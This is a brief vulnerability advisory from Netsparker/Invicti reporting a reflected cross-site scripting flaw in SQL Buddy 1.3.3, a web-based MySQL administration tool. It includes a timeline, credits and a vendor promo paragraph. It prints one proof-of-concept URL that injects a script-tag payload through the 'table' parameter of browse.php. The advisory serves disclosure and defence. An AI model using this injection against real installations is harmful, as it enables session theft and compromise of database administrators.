XSS Vulnerability in SQL Buddy

Information

Advisory by Netsparker (now Invicti)
Name: XSS Vulnerabilities in SQL Buddy
Software: SQL Buddy v1.3.3 and possibly below.
Vendor Homepage: http://sqlbuddy.com/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-019

Description

SQL Buddy – Web-based MySQL administration

Details

SQL Buddy is affected by XSS vulnerabilities in version 1.3.3.
Example PoC URLs are as follows:

  • Cross-site Scripting
    http://example.com/sqlbuddy/browse.php?ajaxRequest=89&db=information_schema&table=';"--></style></scRipt><scRipt>alert(0x000290)</scRipt> (Querystring)

Learn more about Cross-site Scripting vulnerabilities:

Advisory Timeline

22/04/2014 – First Contact
05/06/2014 – Advisory Released

Credits

It has been discovered on testing of Invicti Web Application Security Scanner.

About Invicti

Invicti can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.